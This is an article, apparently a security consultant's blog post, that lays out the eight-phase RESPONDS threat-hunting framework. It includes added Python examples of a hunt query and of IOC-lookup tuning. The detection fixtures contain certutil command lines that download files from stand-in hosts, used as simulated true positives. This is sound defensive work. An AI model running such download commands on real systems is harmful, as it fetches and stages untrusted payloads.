The RESPONDS Threat Hunting Framework

Threat hunting is not simply about reacting to alerts; it’s about proactively searching for threats that existing tooling has not yet detected. This typically involves several phases, which I’ve compiled into an easy-to-remember framework called the RESPONDS Threat Hunting Framework.

The RESPONDS Threat Hunting Framework provides a structured, repeatable methodology for conducting hunts across an environment. It guides hunters through eight distinct yet interconnected phases, from research to scaling operations. 

RESPONDS is an acronym representing the following sequential phases:

  • Research
  • Establish Hypothesis
  • Scope Hunt
  • Plan & Develop Hunt
  • Observe
  • Notify & Execute
  • Diagnose & Tune
  • Scale

Each phase contains specific activities and delivers tangible outcomes that feed into the next step. Let’s explore each in detail.

The Research phase lays the groundwork for the hunt. Hunters collect and analyze various intelligence sources such as:

  • Threat feeds
  • OSINT 
  • Dark web activity
  • Vendor reports
  • Human intelligence (HUMINT)
  • Social media
  • Security blogs

The outcome of this phase is a set of indicators of compromise (IOCs), tactics, techniques, and procedures (TTPs), and potential attack scenarios that inform the hypothesis.

In the Establish Hypothesis phase, hunters use the research results from the first phase to create one or more hypotheses about potential threat actor behavior. This can include:

  • Defining threat scenarios
  • Prioritizing risk areas (e.g., business-critical systems, high value targets, and crown jewels)
  • Crafting analytical questions

The outcome of this phase is a set of clear, testable hypotheses that drive the hunt’s objectives.

Scope Hunt – here, the hunter defines the parameters of the hunt. The hunt can be structured (based on known behaviors, TTPs, or attack patterns), unstructured (a reactive, intel-driven model that examines atomic indicators such as hashes, IP addresses, and domains), or situational (also known as entity-based, focusing on the key users, assets, endpoints, and data most at risk of compromise, the “crown jewels”). The outcome of this phase is a decision on which hunting approach to use: structured, unstructured, or situational.

As the hunter progresses to the Plan & Develop Hunt phase, the hypothesis is translated into technical queries that can prove or disprove it. In most cases this work is done in a Security Information and Event Management (SIEM) platform such as Splunk, QRadar, or Elastic; however, the data may live in a database, raw log files, or a data lake and require ad-hoc querying or regular expressions to extract the events of interest. If central logging isn’t available, hunters may, while not ideal, sample a limited time frame or a subset of systems to test the hypothesis. The outcome of the Plan & Develop Hunt phase is a hunt query that looks for indications of the suspected malicious activity.

The Observe phase is where the rubber meets the road. Analysts test their hypotheses by validating the hunt logic, simulating true positives to confirm the logic actually fires, or leveraging red team activity to exercise detection capabilities. The outcome of this phase is a validated artifact that allows the hunter to prove or disprove the hypothesis.
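As an added example (not code from the article or the author), here is what the Plan & Develop and Observe phases look like when the hunt logic is written as a function instead of a SIEM search. The hypothesis is that an adversary is using certutil.exe to download a payload, a well-known living-off-the-land technique. The event schema, field names, and every sample event are constructed for this illustration; in a SIEM the same logic would be a query over process-creation events.

```python
# Added example (not from the article): a hunt query written as a function over
# process-creation events, plus the Observe-phase check that the logic fires on a
# simulated true positive and not on benign use. The event schema, field names and
# sample events are constructed for this illustration.
import json
import re

# Hypothesis under test: an adversary uses certutil.exe to download a payload.
# Matching is behavioral (flag + URL on the command line), not a fixed IOC.
DOWNLOAD_FLAG = re.compile(r"-urlcache", re.IGNORECASE)
URL = re.compile(r"https?://\S+", re.IGNORECASE)

# Constructed sample: three process-creation events, roughly Sysmon/EDR shaped.
SAMPLE_EVENTS = [
    json.dumps({"ts": "2024-05-01T10:00:01Z", "host": "WS-01", "user": "jdoe",
                "image": r"C:\Windows\System32\certutil.exe",
                "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.5/x.txt x.exe"}),
    json.dumps({"ts": "2024-05-01T10:02:11Z", "host": "WS-02", "user": "asmith",
                "image": r"C:\Windows\System32\certutil.exe",
                "cmdline": r"certutil.exe -hashfile C:\tools\installer.msi SHA256"}),
    json.dumps({"ts": "2024-05-01T10:03:40Z", "host": "WS-03", "user": "bnguyen",
                "image": r"C:\Windows\System32\notepad.exe",
                "cmdline": "notepad.exe notes.txt"}),
]


def hunt_certutil_download(raw_events):
    """Plan & Develop: the hunt query. Returns one finding per matching event."""
    findings = []
    for line in raw_events:
        ev = json.loads(line)
        image = ev.get("image", "").lower()
        cmdline = ev.get("cmdline", "")
        if not image.endswith("certutil.exe"):
            continue
        url = URL.search(cmdline)
        if not (DOWNLOAD_FLAG.search(cmdline) and url):
            continue
        findings.append({"ts": ev["ts"], "host": ev["host"], "user": ev["user"],
                         "url": url.group(0)})
    return findings


def validate_hunt_logic():
    """Observe: prove the logic before trusting it. A simulated true positive must
    fire and a known-benign certutil invocation must stay silent."""
    simulated_tp = json.dumps({"ts": "2024-05-01T11:00:00Z", "host": "LAB-01", "user": "redteam",
                               "image": r"C:\Windows\System32\certutil.exe",
                               "cmdline": "certutil -URLCACHE -f https://lab.example.test/p.ps1 p.ps1"})
    benign = json.dumps({"ts": "2024-05-01T11:00:05Z", "host": "LAB-01", "user": "admin",
                         "image": r"C:\Windows\System32\certutil.exe",
                         "cmdline": "certutil -store My"})
    return {
        "true_positive_detected": len(hunt_certutil_download([simulated_tp])) == 1,
        "benign_ignored": len(hunt_certutil_download([benign])) == 0,
    }


if __name__ == "__main__":
    for finding in hunt_certutil_download(SAMPLE_EVENTS):
        print("finding:", finding)
    print("validation:", validate_hunt_logic())
```

The validation step is the Observe phase in miniature: the simulated true positive is the artifact that proves the logic can see the behavior, and the benign case is the first guard against noise before the query ever runs against production data.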

In the Notify & Execute phase, the hunt logic is run: in real time against events as they are written, manually at points in time, or automatically at set intervals (e.g., daily). If the hunt logic returns results, the hunter validates the finding and escalates it to responders. The outcome of this phase is either a notification of findings or a documented false positive. An absence of findings should also be communicated to stakeholders; a hunt that found nothing still tells them the hypothesis was tested.

After initial execution, the Diagnose & Tune phase ensures precision and efficiency as the hunt continues to be executed. I was once working with a customer who wasn’t seeing the value in the threat hunting service we were providing and the time to decide if they wanted to purchase the service or drop it was days away. We had a database with over 8 million IOCs, so after some discussion, we made the decision to do a mass lookup of IOCs written to our collection in the last 7 days (approximately 90,000 entries) against 30 days of the customer’s logs stored in a cloud hosted database. A couple days later, I was called into a meeting with our finance team and asked to explain the spike in AWS spend that cost the company $20,000 in one day. It was an expensive mistake and a great lesson in why tuning hunts can be incredibly important. In the Diagnose & Tune phase, include and exclude statements can be appended, false positives are removed to minimize noise, and queries are refined to run optimally on your technology stack. The ideal outcome in this phase is a reduction in noise and improved fidelity in future detections.
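As an added example (not code from the article or the author), here are two Diagnose & Tune changes applied to the kind of bulk IOC lookup described above. The first restructures the lookup from one log scan per indicator into a single pass with set membership, which is the difference between work that grows as indicators × log rows and work that grows as log rows alone. The second appends an exclusion for a documented false-positive source. The log format, the indicator list, the excluded host, and the row counter used as a stand-in for query cost are all constructed for this illustration.

```python
# Added example (not from the article): Diagnose & Tune applied to a bulk IOC lookup.
# The "work" counter models rows examined, which is what a SIEM or cloud database
# ultimately bills for. Logs, indicators and the excluded host are constructed.

# Constructed DNS query logs, key=value style.
SAMPLE_DNS_LOGS = [
    "2024-05-01T09:00:00Z host=WS-01 query=updates.vendor.example",
    "2024-05-01T09:00:05Z host=WS-01 query=c2.badexample.test",
    "2024-05-01T09:01:00Z host=SANDBOX-01 query=c2.badexample.test",
    "2024-05-01T09:01:30Z host=SANDBOX-01 query=drop.badexample.test",
    "2024-05-01T09:02:00Z host=WS-03 query=mail.example.org",
]

# Constructed indicator list (domains here; hashes or IPs would be handled the same way).
IOC_DOMAINS = ["c2.badexample.test", "drop.badexample.test", "stage.badexample.test"]

# Tuning decision recorded alongside the hunt: SANDBOX-01 is a malware detonation
# host that resolves known-bad domains on purpose, so its hits are documented
# false positives and are excluded.
EXCLUDED_HOSTS = frozenset({"SANDBOX-01"})


def parse_dns_line(line):
    """Split 'ts key=value key=value' into a dict."""
    ts, rest = line.split(" ", 1)
    fields = dict(kv.split("=", 1) for kv in rest.split())
    fields["ts"] = ts
    return fields


def naive_ioc_lookup(logs, iocs):
    """One scan of the logs per indicator: rows examined = len(iocs) * len(logs).
    This is the shape of a loop that runs one query per IOC against the whole window."""
    hits, work = [], 0
    for ioc in iocs:
        for line in logs:
            work += 1
            ev = parse_dns_line(line)
            if ev.get("query") == ioc:
                hits.append((ev["host"], ioc))
    return sorted(hits), work


def tuned_ioc_lookup(logs, iocs, excluded_hosts=frozenset()):
    """One scan of the logs with set membership per row: rows examined = len(logs)
    regardless of indicator count. Exclusions drop documented false positives."""
    ioc_set = set(iocs)
    hits, work = [], 0
    for line in logs:
        work += 1
        ev = parse_dns_line(line)
        if ev.get("host") in excluded_hosts:
            continue
        if ev.get("query") in ioc_set:
            hits.append((ev["host"], ev["query"]))
    return sorted(hits), work


def compare_lookups(logs=SAMPLE_DNS_LOGS, iocs=IOC_DOMAINS):
    """Run both versions and return hits and rows examined for each."""
    naive_hits, naive_work = naive_ioc_lookup(logs, iocs)
    tuned_hits, tuned_work = tuned_ioc_lookup(logs, iocs, EXCLUDED_HOSTS)
    return {"naive_hits": naive_hits, "naive_work": naive_work,
            "tuned_hits": tuned_hits, "tuned_work": tuned_work}


if __name__ == "__main__":
    result = compare_lookups()
    print(f"naive: {result['naive_work']} rows examined, hits={result['naive_hits']}")
    print(f"tuned: {result['tuned_work']} rows examined, hits={result['tuned_hits']}")
```

In a SIEM the single-pass version corresponds to loading the indicators as a lookup table and joining once, rather than issuing one search per indicator; in a billed-per-scan database it is also worth bounding the time window and estimating rows scanned before the query is submitted. The exclusion is deliberately a host-level allowlist recorded next to the hunt, so the next hunter can see why SANDBOX-01 never appears in the results.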

The final phase of the RESPONDS framework is Scale. Successful hunts should not be one-offs. Each hunter has limited time, won’t be at the organization forever, and needs time off. Relying on humans to conduct daily hunts that could be automated is a waste of resources. In the Scale phase the goal is to minimize human involvement where possible; activities include automating detection rules, documenting findings, converting hunt logic to detection-as-code, and creating permanent, scalable detections. The outcome of this phase is a robust set of automated (or semi-automated) detections that protect against similar future threats.

The RESPONDS framework includes a feedback loop where findings—positive or not—are fed back into the Threat Intelligence pool and Lessons Learned documentation. This ensures organizational knowledge is continuously updated and future hunts are more refined. The RESPONDS framework transforms ad-hoc threat hunting into a disciplined, iterative process. It promotes collaboration across teams, improves detection accuracy, and ultimately elevates your organization’s threat hunting maturity. 

To dive deeper into threat hunting strategies or schedule a consulting call, visit TheMikeWylie.com or connect with Michael Wylie on LinkedIn (https://www.linkedin.com/in/mwylie). 

About the Author

Michael Wylie, MBA, CISSP leads a global managed threat hunting team at Zscaler and has built world-class detection programs across the public and private sectors. A former Director of Threat Hunting at CrowdStrike and a top 100 accounting firm, he specializes in DFIR, threat hunting, and operationalizing AI in SecOps. Michael is also a trusted author and educator, having trained tens of thousands of cybersecurity professionals globally.